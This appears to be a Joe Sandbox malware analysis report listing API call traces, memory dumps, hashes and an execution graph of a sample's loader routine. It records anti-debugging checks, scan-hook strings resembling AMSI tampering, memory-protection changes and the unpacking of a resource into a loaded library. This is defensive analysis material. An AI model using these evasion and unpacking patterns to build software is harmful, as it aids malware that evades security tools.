                                                                                                                              APIs
                                                                                                                              • GetThreadLocale.KERNEL32(?,00000000,02B2AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B2AAAF
                                                                                                                                • Part of subcall function 02B2A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A762
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Locale$InfoThread
                                                                                                                              • String ID: eeee$ggg$yyyy
                                                                                                                              • API String ID: 4232894706-1253427255
                                                                                                                              • Opcode ID: b750038e9c89debfc4cee12a1f2013b4bcb7ad13777f4659e02d22528c5655cd
                                                                                                                              • Instruction ID: 19d47aabf594e3cf978a46fec59b86228c00f9641e24902e1f6034792b09de02
                                                                                                                              • Opcode Fuzzy Hash: b750038e9c89debfc4cee12a1f2013b4bcb7ad13777f4659e02d22528c5655cd
                                                                                                                              • Instruction Fuzzy Hash: 7C41F2313043394BD701AB688C907BEB3FBDB85200B5455E5A47ED7714EA68E90DCA21
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                                                • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                                              • GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule$AddressProc
                                                                                                                              • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                              • API String ID: 1883125708-1952140341
                                                                                                                              • Opcode ID: 611439da5fda73215915846b13a337ff9c093b8236d7d987a482c0b456fcc2fb
                                                                                                                              • Instruction ID: 67369ba15b2ef030814d666a6cc287ed0db5d5708a1517ed16dd016d4c00d9c1
                                                                                                                              • Opcode Fuzzy Hash: 611439da5fda73215915846b13a337ff9c093b8236d7d987a482c0b456fcc2fb
                                                                                                                              • Instruction Fuzzy Hash: 07F09071650308BFEB02EFA8DC5195E77BEEB49B40B9149E0F508D3A10DA30AE14DA22
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(KernelBase,?,02B3EF90,UacInitialize,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString), ref: 02B3EB92
                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B3EBA4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                              • String ID: IsDebuggerPresent$KernelBase
                                                                                                                              • API String ID: 1646373207-2367923768
                                                                                                                              • Opcode ID: 26a03fe9f57e4a343732b95ce0c2763a0328db9ae733b17bc54e3a23e9f858f7
                                                                                                                              • Instruction ID: 4efd73a15327f5f74c5022468ea0d1c43ab416030ceddd4617969965212bb60a
                                                                                                                              • Opcode Fuzzy Hash: 26a03fe9f57e4a343732b95ce0c2763a0328db9ae733b17bc54e3a23e9f858f7
                                                                                                                              • Instruction Fuzzy Hash: A0D012713513601DF9037AF40CC4C9E23CD8F0552D7200EE2B027D10E1F966C8195511
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,02B4C10B,00000000,02B4C11E), ref: 02B2C3FA
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B2C40B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                              • API String ID: 1646373207-3712701948
                                                                                                                              • Opcode ID: f2a80324dfd80789de8712b32feac9ddc1184fbd5b72273787e003245f3874fd
                                                                                                                              • Instruction ID: 2b1bf4ae431757d57b119d2465ed539047aab8329ff5b202203a6556dcdb15a9
                                                                                                                              • Opcode Fuzzy Hash: f2a80324dfd80789de8712b32feac9ddc1184fbd5b72273787e003245f3874fd
                                                                                                                              • Instruction Fuzzy Hash: 1FD05E79A403724AF700AFB168C163F2BC8A714785F0558E6F01D57101D7B1441C4F56
                                                                                                                              APIs
                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B2E217
                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B2E233
                                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B2E2AA
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 02B2E2D3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 920484758-0
                                                                                                                              • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                              • Instruction ID: 5e5334e8bcb318eabf8c51893ae59f510fa7dcc4444bf11d1c945759e12d8e69
                                                                                                                              • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                              • Instruction Fuzzy Hash: 6441E775A003399BCB61DB59CC90BD9B3BDEF49205F0042E5E64DA7215DA30EF888F64
                                                                                                                              APIs
                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2ACD9
                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2ACFD
                                                                                                                              • GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD18
                                                                                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2ADAE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3990497365-0
                                                                                                                              • Opcode ID: 5c7d029f37b619222101338d6ce81cc880e5b12ac0401df6e131c6cdf36d84ad
                                                                                                                              • Instruction ID: cf617d44c66255a356b58c6b4d9fde1f39eaabb5289a385741597e4b54eb6d4f
                                                                                                                              • Opcode Fuzzy Hash: 5c7d029f37b619222101338d6ce81cc880e5b12ac0401df6e131c6cdf36d84ad
                                                                                                                              • Instruction Fuzzy Hash: DC410971A403689BDB21EB68CC84BDAB7FDAB08341F0444E5A64CE7245DB749F898F50
                                                                                                                              APIs
                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2ACD9
                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2ACFD
                                                                                                                              • GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD18
                                                                                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2ADAE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3990497365-0
                                                                                                                              • Opcode ID: 6cb2393a1fe9958aa3a44a8da3819f56690c7d57dcbfb0e0f14c908b18193348
                                                                                                                              • Instruction ID: 6b6e94098aae8ed03a493fe9e1b9b7019eaaa9732113d55a8b5385f4a11af88a
                                                                                                                              • Opcode Fuzzy Hash: 6cb2393a1fe9958aa3a44a8da3819f56690c7d57dcbfb0e0f14c908b18193348
                                                                                                                              • Instruction Fuzzy Hash: CE411871A403689BDB21EB68CC84BDAB7FDAB08341F0404E5A64CE7245DB74AF8D8F50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 946857dcb933822409bca6afe2e70c9e6fd5c4f4945d42e3ee3e795b048f24fc
                                                                                                                              • Instruction ID: b4b5eaaae65d75ed8967f4af1fe44883c9f3919e991df1f14feb89b47892d704
                                                                                                                              • Opcode Fuzzy Hash: 946857dcb933822409bca6afe2e70c9e6fd5c4f4945d42e3ee3e795b048f24fc
                                                                                                                              • Instruction Fuzzy Hash: 3FA1E8767317244BE718EA7C9C803ADB386DBC4265F1842FEE52DCB387DB64C9498650
                                                                                                                              APIs
                                                                                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B2955A), ref: 02B294F2
                                                                                                                              • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B2955A), ref: 02B294F8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DateFormatLocaleThread
                                                                                                                              • String ID: yyyy
                                                                                                                              • API String ID: 3303714858-3145165042
                                                                                                                              • Opcode ID: 0972061e0d9b2ed601e2c39bbdb534eda00e997dfa74db4ef33f8498be0e050d
                                                                                                                              • Instruction ID: 9d1cbbf1408f96dddcd1da2e1f7642d657ac21fd6c49c1a600ac0a5599dcdba9
                                                                                                                              • Opcode Fuzzy Hash: 0972061e0d9b2ed601e2c39bbdb534eda00e997dfa74db4ef33f8498be0e050d
                                                                                                                              • Instruction Fuzzy Hash: 10214871A007389FDB11DFA8C841AAEB3BDEF09710F6100E6E94DE7651D6349E48CAA5
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                                                • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                                              • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B3820E), ref: 02B381F0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                              • String ID: FlushInstructionCache$Kernel32
                                                                                                                              • API String ID: 3811539418-184458249
                                                                                                                              • Opcode ID: 32eec884ed6b14f541f9d469b161884c9a881a05f8b0b60313e9e03fea32d17b
                                                                                                                              • Instruction ID: 6cf90b896b93ff660f3034bd11dd4324f15742d64e29f41b7a1fc2a00ec1096f
                                                                                                                              • Opcode Fuzzy Hash: 32eec884ed6b14f541f9d469b161884c9a881a05f8b0b60313e9e03fea32d17b
                                                                                                                              • Instruction Fuzzy Hash: E9016D75650704BFEB02EFA8DC41F5A77ADEB48B10F5184A0B508E7A40D634AD14CA21
                                                                                                                              APIs
                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AD90
                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004), ref: 02B3ADC0
                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000008), ref: 02B3ADDF
                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3ADEB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Read$Write
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3448952669-0
                                                                                                                              • Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                                                                              • Instruction ID: af0077796bfbd479a69f6cb7f1f1febcd90d632b3f413e8c0751cdb26ecd95e3
                                                                                                                              • Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                                                                              • Instruction Fuzzy Hash: 9121D6B16403199BDB12DF29CC80BAE73B9EF40311F108191FE9497344DB38ED119AA0

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:5%
                                                                                                                              Dynamic/Decrypted Code Coverage:1.2%
                                                                                                                              Signature Coverage:4.6%
                                                                                                                              Total number of Nodes:1252
                                                                                                                              Total number of Limit Nodes:49
                                                                                                                              execution_graph 14198 252b9308 14199 252b9348 CloseHandle 14198->14199 14201 252b9379 14199->14201 14202 252b0890 14203 252b08b1 14202->14203 14204 252b097a 14203->14204 14207 252b1838 14203->14207 14210 252b3bf3 14203->14210 14213 252b9080 14207->14213 14212 252b9080 VirtualProtect 14210->14212 14211 252b3c12 14212->14211 14215 252b9093 14213->14215 14217 252b9130 14215->14217 14218 252b9178 VirtualProtect 14217->14218 14220 252b1851 14218->14220 14221 40cbdd 14222 40cbe9 _ftell 14221->14222 14256 40d534 HeapCreate 14222->14256 14225 40cc46 14258 41087e GetModuleHandleW 14225->14258 14229 40cc57 __RTC_Initialize 14292 411a15 14229->14292 14230 40cbb4 _fast_error_exit 63 API calls 14230->14229 14232 40cc66 14233 40cc72 GetCommandLineA 14232->14233 14432 40e79a 14232->14432 14307 412892 14233->14307 14240 40e79a __amsg_exit 63 API calls 14242 40cc97 14240->14242 14346 41255f 14242->14346 14244 40cca8 14361 40e859 14244->14361 14246 40e79a __amsg_exit 63 API calls 14246->14244 14247 40ccb0 14248 40ccbb 14247->14248 14249 40e79a __amsg_exit 63 API calls 14247->14249 14367 4019f0 OleInitialize 14248->14367 14249->14248 14251 40ccd8 14252 40ccea 14251->14252 14421 40ea0a 14251->14421 14439 40ea36 14252->14439 14255 40ccef _ftell 14257 40cc3a 14256->14257 14257->14225 14424 40cbb4 14257->14424 14259 410892 14258->14259 14260 410899 14258->14260 14442 40e76a 14259->14442 14261 410a01 14260->14261 14262 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14260->14262 14501 410598 14261->14501 14265 4108ec TlsAlloc 14262->14265 14268 40cc4c 14265->14268 14269 41093a TlsSetValue 14265->14269 14268->14229 14268->14230 14269->14268 14270 41094b 14269->14270 14446 40ea54 14270->14446 14275 41046e __encode_pointer 6 API calls 14276 41096b 14275->14276 14277 41046e __encode_pointer 6 API calls 14276->14277 14278 41097b 14277->14278 14279 41046e __encode_pointer 6 API calls 14278->14279 14280 41098b 14279->14280 14463 40d564 14280->14463 14287 4104e9 __decode_pointer 6 API calls 14288 4109df 14287->14288 14288->14261 14289 4109e6 14288->14289 14483 4105d5 14289->14483 14291 4109ee GetCurrentThreadId 14291->14268 14807 40e1d8 14292->14807 14294 411a21 GetStartupInfoA 14295 411cba __calloc_crt 63 API calls 14294->14295 14301 411a42 14295->14301 14296 411c60 _ftell 14296->14232 14297 411bdd GetStdHandle 14302 411ba7 14297->14302 14298 411c42 SetHandleCount 14298->14296 14299 411cba __calloc_crt 63 API calls 14299->14301 14300 411bef GetFileType 14300->14302 14301->14296 14301->14299 14301->14302 14305 411b2a 14301->14305 14302->14296 14302->14297 14302->14298 14302->14300 14303 41389c ___lock_fhandle InitializeCriticalSectionAndSpinCount 14302->14303 14303->14302 14304 411b53 GetFileType 14304->14305 14305->14296 14305->14302 14305->14304 14306 41389c ___lock_fhandle InitializeCriticalSectionAndSpinCount 14305->14306 14306->14305 14308 4128b0 GetEnvironmentStringsW 14307->14308 14309 4128cf 14307->14309 14310 4128c4 GetLastError 14308->14310 14311 4128b8 14308->14311 14309->14311 14312 412968 14309->14312 14310->14309 14313 4128eb GetEnvironmentStringsW 14311->14313 14314 4128fa WideCharToMultiByte 14311->14314 14315 412971 GetEnvironmentStrings 14312->14315 14316 40cc82 14312->14316 14313->14314 14313->14316 14320 41295d FreeEnvironmentStringsW 14314->14320 14321 41292e 14314->14321 14315->14316 14317 412981 14315->14317 14333 4127d7 14316->14333 14322 411c75 __malloc_crt 63 API calls 14317->14322 14320->14316 14323 411c75 __malloc_crt 63 API calls 14321->14323 14325 41299b 14322->14325 14324 412934 14323->14324 14324->14320 14328 41293c WideCharToMultiByte 14324->14328 14326 4129a2 FreeEnvironmentStringsA 14325->14326 14327 4129ae _memcpy_s 14325->14327 14326->14316 14331 4129b8 FreeEnvironmentStringsA 14327->14331 14329 412956 14328->14329 14330 41294e 14328->14330 14329->14320 14332 40b6b5 ___crtsetenv 63 API calls 14330->14332 14331->14316 14332->14329 14334 4127f1 GetModuleFileNameA 14333->14334 14335 4127ec 14333->14335 14337 412818 14334->14337 14814 41446b 14335->14814 14808 41263d 14337->14808 14340 40cc8c 14340->14240 14340->14242 14341 412854 14342 411c75 __malloc_crt 63 API calls 14341->14342 14343 41285a 14342->14343 14343->14340 14344 41263d _parse_cmdline 73 API calls 14343->14344 14345 412874 14344->14345 14345->14340 14347 412568 14346->14347 14351 41256d _strlen 14346->14351 14348 41446b ___initmbctable 107 API calls 14347->14348 14348->14351 14349 40cc9d 14349->14244 14349->14246 14350 411cba __calloc_crt 63 API calls 14356 4125a2 _strlen 14350->14356 14351->14349 14351->14350 14352 412600 14353 40b6b5 ___crtsetenv 63 API calls 14352->14353 14353->14349 14354 411cba __calloc_crt 63 API calls 14354->14356 14355 412626 14357 40b6b5 ___crtsetenv 63 API calls 14355->14357 14356->14349 14356->14352 14356->14354 14356->14355 14358 40ef42 _strcpy_s 63 API calls 14356->14358 14359 4125e7 14356->14359 14357->14349 14358->14356 14359->14356 14360 40e61c __invoke_watson 10 API calls 14359->14360 14360->14359 14362 40e867 __IsNonwritableInCurrentImage 14361->14362 15225 413586 14362->15225 14364 40e885 __initterm_e 14366 40e8a4 __IsNonwritableInCurrentImage __initterm 14364->14366 15229 40d2bd 14364->15229 14366->14247 14368 401ab9 14367->14368 15329 40b99e 14368->15329 14370 401abf 14371 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 14370->14371 14400 402467 14370->14400 14372 401dc3 CloseHandle GetModuleHandleA 14371->14372 14380 401c55 14371->14380 15342 401650 14372->15342 14374 401e8b FindResourceA LoadResource LockResource SizeofResource 14375 40b84d _malloc 63 API calls 14374->14375 14376 401ebf 14375->14376 15344 40af66 14376->15344 14378 401c9c CloseHandle 14378->14251 14379 401ecb _memset 14381 401efc SizeofResource 14379->14381 14380->14378 14384 401cf9 Module32Next 14380->14384 14382 401f1c 14381->14382 14383 401f5f 14381->14383 14382->14383 15382 401560 14382->15382 14386 401f92 _memset 14383->14386 14387 401560 __VEC_memcpy 14383->14387 14384->14372 14392 401d0f 14384->14392 14388 401fa2 FreeResource 14386->14388 14387->14386 14389 40b84d _malloc 63 API calls 14388->14389 14390 401fbb SizeofResource 14389->14390 14391 401fe5 _memset 14390->14391 14393 4020aa LoadLibraryA 14391->14393 14392->14378 14396 401dad Module32Next 14392->14396 14394 401650 14393->14394 14395 40216c GetProcAddress 14394->14395 14397 4021aa 14395->14397 14395->14400 14396->14372 14396->14392 14397->14400 15356 4018f0 14397->15356 14399 40b6b5 ___crtsetenv 63 API calls 14399->14400 14400->14251 14401 4021f1 14419 40243f 14401->14419 15368 401870 14401->15368 14403 402269 VariantInit 14404 401870 76 API calls 14403->14404 14405 40228b VariantInit 14404->14405 14406 4022a7 14405->14406 14407 4022d9 SafeArrayCreate SafeArrayAccessData 14406->14407 15373 40b350 14407->15373 14410 40232c 14411 402354 SafeArrayDestroy 14410->14411 14420 40235b 14410->14420 14411->14420 14412 402392 SafeArrayCreateVector 14413 4023a4 14412->14413 14414 4023bc VariantClear VariantClear 14413->14414 15375 4019a0 14414->15375 14417 40242e 14418 4019a0 66 API calls 14417->14418 14418->14419 14419->14399 14419->14400 14420->14412 15647 40e8de 14421->15647 14423 40ea1b 14423->14252 14425 40cbc2 14424->14425 14426 40cbc7 14424->14426 14427 40ec4d __FF_MSGBANNER 63 API calls 14425->14427 14428 40eaa2 __NMSG_WRITE 63 API calls 14426->14428 